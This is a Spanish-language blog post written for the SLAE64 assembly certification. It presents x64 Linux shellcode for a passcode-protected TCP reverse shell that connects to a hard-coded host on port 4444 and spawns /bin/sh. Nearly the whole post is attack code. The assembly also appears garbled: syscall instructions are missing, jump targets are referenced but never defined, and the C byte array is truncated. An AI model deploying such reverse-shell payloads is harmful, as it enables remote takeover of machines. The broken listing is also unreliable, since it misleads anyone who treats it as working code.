domingo, 25 de mayo de 2014

[SLAEx64] II tcp_reverse_shell with passcode

Source: SecurityTube

This is x64 bits tcp reverse shell with passcode, if you need more explications, please check my post about x32 bits reverse shell, where you can found man about *nix socket programing

shell asm source

; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322
; 138 bytes
global _start
section .text

    ;socket syscall
    push byte 0x29 ; 41 socket 
    pop rax    
    push byte 0x2 ; AF_INET
    pop rdi  
    push byte 0x1 ; SOCK_STREAM
    pop rsi    
    cdq ;rdx = 0 - ANY
    xchg rdi, rax ; save socket descriptor
    mov dword [rsp-4], 0x0901a8c0 ; ip
    mov word [rsp-6], 0x5c11      ; port 4444
    mov byte [rsp-8], 0x02
    sub rsp, 8
    push byte 0x2a ; connect
    pop rax
    mov rsi, rsp   ; pointer    
    push byte 0x10 ; len
    pop rdx

    push byte 0x3; counter 
    pop rsi

    dec rsi
    push byte 0x21
    pop rax
    jnz dup2_loop ; jump if not 0

    ;read buffer
    mov rdi, rax ; socket
    mov byte [rsp-1], al ;0 read
    sub rsp, 1
    push rdx 
    lea rsi, [rsp-0x10] ; 16 bytes from buf
    add dl, 0x10        ; size_t count
    ;test passcode
    mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex')
    push rdi                    ; save the socket
    lea rdi, [rsi]              ; load string from address
    scasq                       ; compare
    jz accepted_passwd          ; jump if equal
    ;exit if different :P
    push byte 0x3c 
    pop rax

    pop rdi; socket
    xor rax, rax
    mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
    push rbx
    mov rdi, rsp
    push rax
    mov rdx, rsp
    push rdi 
    mov rsi, rsp
    add al, 0x3b

C output

// 138 bytes 
unsigned char code[] =\
"\xc0\xa8\x01\x09" //ip big endiant
"\x11\x5c" //port big endiant


Correct passwd

Incorrect passwd

This shellcode was accepted to and can be found here, special thank to @JonathanSalwan for accept it :)

SLAE64 - 1322

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

SecurityTube Linux Assembly Expert x64

No hay comentarios:

Publicar un comentario en la entrada